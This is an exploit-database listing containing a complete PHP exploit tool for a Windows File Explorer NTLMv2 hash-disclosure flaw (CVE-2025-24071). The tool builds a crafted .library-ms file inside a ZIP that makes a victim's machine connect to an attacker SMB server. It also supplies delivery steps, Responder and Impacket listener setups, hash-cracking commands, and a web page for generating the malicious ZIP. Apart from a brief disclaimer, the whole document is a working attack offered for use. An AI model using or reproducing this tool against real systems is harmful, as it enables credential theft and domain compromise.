Share
## https://sploitus.com/exploit?id=PACKETSTORM:212497
=============================================================================================================================================
    | # Title     : Windows File Explorer NTLM v2 Hash Disclosure
                                                                    |
    | # Author    : indoushka
                                                                    |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64
    bits)                                                            |
    | # Vendor    : System built‑in component.No standalone download available
                                                                     |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/197740/ &
    CVE-2025-24071
    
    [+] Summary :
                Windows File Explorer in Windows 10 and 11 contains a critical
    NTLM hash disclosure vulnerability that allows attackers to capture user
    authentication
    credentials by exploiting the automatic parsing of .library-ms files from
    ZIP archives, leading to potential domain compromise through credential
    relay attacks.
    The vulnerability exists in Windows Explorer's automatic handling of
    .library-ms files extracted from ZIP archives. When a user extracts a
    malicious ZIP file,
    Explorer automatically attempts to connect to SMB shares specified in the
    .library-ms file, leaking NTLMv2 hashes to attacker-controlled servers
    without user interaction.
    
    
    [+]  POC :
    
    php poc.php
    
    <?php
    
    class WindowsNTLMHashDisclosure {
    
        private $ip;
        private $filename;
        private $output_dir;
        private $keep_files;
    
        public function __construct($ip, $filename = 'malicious', $output_dir =
    'output', $keep_files = false) {
            $this->ip = $ip;
            $this->filename = $filename;
            $this->output_dir = rtrim($output_dir, '/');
            $this->keep_files = $keep_files;
        }
    
        public function banner() {
            echo "==================================================\n";
            echo " Windows File Explorer NTLM Hash Disclosure\n";
            echo " CVE-2025-24071 Exploit Tool\n";
            echo " Author: indoushka (PHP Port)\n";
            echo "==================================================\n\n";
        }
    
        public function create_library_ms() {
            $payload = <<<XML
    <?xml version="1.0" encoding="UTF-8"?>
    <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library
    ">
      <searchConnectorDescriptionList>
        <searchConnectorDescription>
          <simpleLocation>
            <url>\\\\{$this->ip}\\shared</url>
          </simpleLocation>
        </searchConnectorDescription>
      </searchConnectorDescriptionList>
    </libraryDescription>
    XML;
    
            $library_file = $this->output_dir . '/' . $this->filename .
    '.library-ms';
    
            if (!file_put_contents($library_file, $payload)) {
                throw new Exception("Failed to create .library-ms file");
            }
    
            echo "[+] Created malicious .library-ms file: {$library_file}\n";
            return $library_file;
        }
    
        public function build_zip($library_file) {
            $zip_file = $this->output_dir . '/' . $this->filename . '.zip';
    
            $zip = new ZipArchive();
            if ($zip->open($zip_file, ZipArchive::CREATE |
    ZipArchive::OVERWRITE) !== TRUE) {
                throw new Exception("Cannot create ZIP file: {$zip_file}");
            }
    
            $zip->addFile($library_file, basename($library_file));
            $zip->close();
    
            echo "[+] Created ZIP archive: {$zip_file}\n";
            return $zip_file;
        }
    
        public function exploit() {
            $this->banner();
    
            echo "[*] Target SMB Server: {$this->ip}\n";
            echo "[*] Output Directory: {$this->output_dir}\n";
            echo "[*] Base Filename: {$this->filename}\n\n";
    
            // Create output directory
            if (!is_dir($this->output_dir)) {
                if (!mkdir($this->output_dir, 0755, true)) {
                    throw new Exception("Failed to create output directory:
    {$this->output_dir}");
                }
            }
    
            // Create malicious .library-ms file
            $library_file = $this->create_library_ms();
    
            // Package into ZIP
            $zip_file = $this->build_zip($library_file);
    
            // Clean up if not keeping files
            if (!$this->keep_files && file_exists($library_file)) {
                unlink($library_file);
                echo "[-] Removed intermediate .library-ms file\n";
            }
    
            $this->display_instructions($zip_file);
    
            return $zip_file;
        }
    
        private function display_instructions($zip_file) {
            echo "\n" . str_repeat("=", 60) . "\n";
            echo " EXPLOITATION INSTRUCTIONS\n";
            echo str_repeat("=", 60) . "\n";
            echo "1. Start SMB listener on {$this->ip}:\n";
            echo "   - Using Responder: responder -I eth0 -wrf\n";
            echo "   - Using Impacket: smbserver.py SHARE /tmp/smb
    -smb2support\n";
            echo "\n2. Deliver ZIP file to victim:\n";
            echo "   - File: {$zip_file}\n";
            echo "   - Methods: Email, USB, Network share, etc.\n";
            echo "\n3. When victim extracts ZIP, Windows Explorer will:\n";
            echo "   - Automatically parse .library-ms file\n";
            echo "   - Attempt SMB connection to {$this->ip}\n";
            echo "   - Leak NTLMv2 hash to your SMB server\n";
            echo "\n4. Crack the captured hash:\n";
            echo "   - Use hashcat: hashcat -m 5600 hash.txt wordlist.txt\n";
            echo "   - Use john: john --format=netntlmv2 hash.txt\n";
            echo str_repeat("=", 60) . "\n";
        }
    
        public static function is_valid_ip($ip) {
            return filter_var($ip, FILTER_VALIDATE_IP) !== false;
        }
    
        public function get_file_paths() {
            return [
                'library_ms' => $this->output_dir . '/' . $this->filename .
    '.library-ms',
                'zip' => $this->output_dir . '/' . $this->filename . '.zip'
            ];
        }
    }
    
    class SMBListenerHelper {
    
        public static function generate_responder_config($ip) {
            $config = <<<CONFIG
    ; Responder Configuration for CVE-2025-24071
    ; Save as responder.conf
    
    [Responder Core]
    SQL = On
    SMB = On
    Kerberos = On
    FTP = On
    POP = On
    SMTP = On
    IMAP = On
    HTTP = On
    HTTPS = On
    DNS = On
    LDAP = On
    
    ; Network interface
    Interface = eth0
    
    ; Specific IP to listen on
    BindIP = {$ip}
    
    ; Analysis mode (optional)
    Analyze = On
    CONFIG;
    
            return $config;
        }
    
        public static function generate_smbserver_script() {
            $script = <<<PYTHON
    #!/usr/bin/env python3
    # Impacket SMB Server for CVE-2025-24071
    
    from impacket import smbserver
    from impacket.ntlm import compute_lmhash, compute_nthash
    import argparse
    import threading
    import sys
    
    class CVE202524071Server:
        def __init__(self, listen_address, share_path):
            self.server = smbserver.SimpleSMBServer(listen_address,
    listen_address, 445)
            self.server.addShare("SHARE", share_path)
    
        def start(self):
            print("[*] Starting SMB server for CVE-2025-24071")
            print("[*] Waiting for NTLM hash leakage...")
            self.server.start()
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("--ip", required=True, help="IP to listen on")
        parser.add_argument("--share", default="/tmp/smb", help="Share path")
        args = parser.parse_args()
    
        server = CVE202524071Server(args.ip, args.share)
        server.start()
    PYTHON;
    
            return $script;
        }
    }
    
    class HashCrackingHelper {
    
        public static function display_cracking_commands($hash_file =
    'captured_hashes.txt') {
            $commands = [
                'hashcat' => "hashcat -m 5600 {$hash_file}
    /usr/share/wordlists/rockyou.txt",
                'john' => "john --format=netntlmv2 {$hash_file}",
                'online_crack' => "Use online services like crackstation.net or
    hashes.com"
            ];
    
            echo "\n" . str_repeat("=", 50) . "\n";
            echo " HASH CRACKING COMMANDS\n";
            echo str_repeat("=", 50) . "\n";
    
            foreach ($commands as $tool => $command) {
                echo "{$tool}: {$command}\n";
            }
            echo str_repeat("=", 50) . "\n";
        }
    
        public static function generate_hash_example() {
            $example = <<<HASH
    Example NTLMv2 Hash Format:
    username::domain:challenge:HMAC-MD5:blob
    
    Actual captured hash will look like:
    Administrator::WIN11:1122334455667788:8846F7EAEE8FB117AD06BDD830B7586C:01010000000000000090D336F74CD801B8B5E9545C96D79F000000000200080053004D004200330001001E00570049004E002D0034004300520038004100330056004A0037004B00420004003400570049004E002D0034004300520038004100330056004A0037004B0042002E0053004D00420033002E004C004F00430041004C000300140053004D00420033002E004C004F00430041004C000500140053004D00420033002E004C004F00430041004C00070008000090D336F74CD8010600040002000000080030003000000000000000010000000020000006DE67E84DC5A62919F4D6F6A8F6F6D6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D0A001000000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E003100300030000000000000000000
    HASH;
    
            return $example;
        }
    }
    
    // Command line interface
    if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) ===
    basename(__FILE__)) {
    
        if ($argc < 2) {
            echo "Windows File Explorer NTLM Hash Disclosure
    (CVE-2025-24071)\n";
            echo
    "===========================================================\n";
            echo "Usage: php " . $argv[0] . " <attacker_ip> [options]\n";
            echo "Example: php " . $argv[0] . " 192.168.1.100\n";
            echo "Example: php " . $argv[0] . " 192.168.1.100 -n payroll -o
    ./malicious_zips --keep\n";
            echo "\nOptions:\n";
            echo "  -n, --name      Base filename (default: malicious)\n";
            echo "  -o, --output    Output directory (default: ./output)\n";
            echo "  -k, --keep      Keep .library-ms file after ZIP creation\n";
            echo "  --smb-help      Show SMB listener setup help\n";
            echo "  --crack-help    Show hash cracking instructions\n";
            exit(1);
        }
    
        $ip = $argv[1];
        $filename = 'malicious';
        $output_dir = 'output';
        $keep_files = false;
    
        // Parse command line options
        for ($i = 2; $i < $argc; $i++) {
            switch ($argv[$i]) {
                case '-n':
                case '--name':
                    $filename = $argv[++$i];
                    break;
                case '-o':
                case '--output':
                    $output_dir = $argv[++$i];
                    break;
                case '-k':
                case '--keep':
                    $keep_files = true;
                    break;
                case '--smb-help':
                    echo
    SMBListenerHelper::generate_responder_config('192.168.1.100');
                    echo "\n\n";
                    echo SMBListenerHelper::generate_smbserver_script();
                    exit(0);
                case '--crack-help':
                    HashCrackingHelper::display_cracking_commands();
                    echo "\n" . HashCrackingHelper::generate_hash_example() .
    "\n";
                    exit(0);
            }
        }
    
        try {
            if (!WindowsNTLMHashDisclosure::is_valid_ip($ip)) {
                echo "[-] Invalid IP address: {$ip}\n";
                exit(1);
            }
    
            $exploit = new WindowsNTLMHashDisclosure($ip, $filename,
    $output_dir, $keep_files);
            $zip_file = $exploit->exploit();
    
            echo "\n[+] Exploit files created successfully!\n";
            echo "[+] Deliver this file to the victim: {$zip_file}\n";
    
        } catch (Exception $e) {
            echo "[-] Error: " . $e->getMessage() . "\n";
            exit(1);
        }
    }
    
    // Web interface for the exploit
    if (isset($_GET['web']) && $_GET['web'] === 'true') {
        ?>
        <!DOCTYPE html>
        <html>
        <head>
            <title>CVE-2025-24071 - NTLM Hash Disclosure</title>
            <style>
                body { font-family: Arial, sans-serif; margin: 40px;
    background: #f0f0f0; }
                .container { max-width: 900px; margin: 0 auto; background:
    white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px
    rgba(0,0,0,0.1); }
                h1 { color: #d32f2f; border-bottom: 2px solid #d32f2f;
    padding-bottom: 10px; }
                .form-group { margin: 20px 0; }
                label { display: block; margin-bottom: 5px; font-weight: bold;
    color: #333; }
                input[type="text"] { padding: 10px; width: 300px; border: 1px
    solid #ddd; border-radius: 4px; }
                button { background: #d32f2f; color: white; padding: 12px 25px;
    border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }
                button:hover { background: #b71c1c; }
                .output { background: #f8f8f8; padding: 15px; border-radius:
    4px; margin: 20px 0; white-space: pre-wrap; font-family: monospace; }
                .success { color: #388e3c; font-weight: bold; }
                .error { color: #d32f2f; font-weight: bold; }
                .info-box { background: #e3f2fd; padding: 15px; border-radius:
    4px; margin: 15px 0; }
            </style>
        </head>
        <body>
            <div class="container">
                <h1>CVE-2025-24071 - Windows NTLM Hash Disclosure</h1>
    
                <?php
                if ($_POST['generate'] ?? false) {
                    $ip = $_POST['ip'] ?? '';
                    $filename = $_POST['filename'] ?? 'malicious';
                    $keep_files = isset($_POST['keep_files']);
    
                    if (!empty($ip)) {
                        echo '<div class="output">';
                        try {
                            $exploit = new WindowsNTLMHashDisclosure($ip,
    $filename, 'web_output', $keep_files);
                            $zip_file = $exploit->exploit();
    
                            $file_paths = $exploit->get_file_paths();
                            if (file_exists($file_paths['zip'])) {
                                $file_url = 'web_output/' .
    basename($file_paths['zip']);
                                echo '<p class="success">ZIP file generated
    successfully!</p>';
                                echo '<p><a href="' . $file_url . '"
    download>Download Malicious ZIP File</a></p>';
                            }
                        } catch (Exception $e) {
                            echo '<p class="error">Error: ' . $e->getMessage()
    . '</p>';
                        }
                        echo '</div>';
                    }
                }
                ?>
    
                <form method="post">
                    <div class="form-group">
                        <label for="ip">Your SMB Server IP:</label>
                        <input type="text" id="ip" name="ip"
    placeholder="192.168.1.100" required>
                    </div>
    
                    <div class="form-group">
                        <label for="filename">ZIP Filename:</label>
                        <input type="text" id="filename" name="filename"
    value="malicious">
                    </div>
    
                    <div class="form-group">
                        <label>
                            <input type="checkbox" name="keep_files" value="1">
                            Keep .library-ms file (for analysis)
                        </label>
                    </div>
    
                    <button type="submit" name="generate">Generate Malicious
    ZIP</button>
                </form>
    
                <div class="info-box">
                    <h3>About CVE-2025-24071:</h3>
                    <p>This vulnerability affects Windows File Explorer in
    Windows 10/11. When a user extracts a ZIP file containing a malicious
    .library-ms file, Windows Explorer automatically attempts to connect to an
    SMB server specified in the file, leaking the user's NTLMv2 hash.</p>
    
                    <h3>Exploitation Steps:</h3>
                    <ol>
                        <li>Set up SMB listener on your server</li>
                        <li>Generate malicious ZIP using this tool</li>
                        <li>Deliver ZIP to target user</li>
                        <li>Capture NTLM hash when they extract the file</li>
                        <li>Crack the hash to obtain credentials</li>
                    </ol>
    
                    <p><strong>Note:</strong> This tool is for educational and
    authorized testing purposes only.</p>
                </div>
            </div>
        </body>
        </html>
        <?php
        exit;
    }
    
    ?>
    
    
    
    Greetings to
    :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
    (John Page aka hyp3rlinx)|
    ===================================================================================================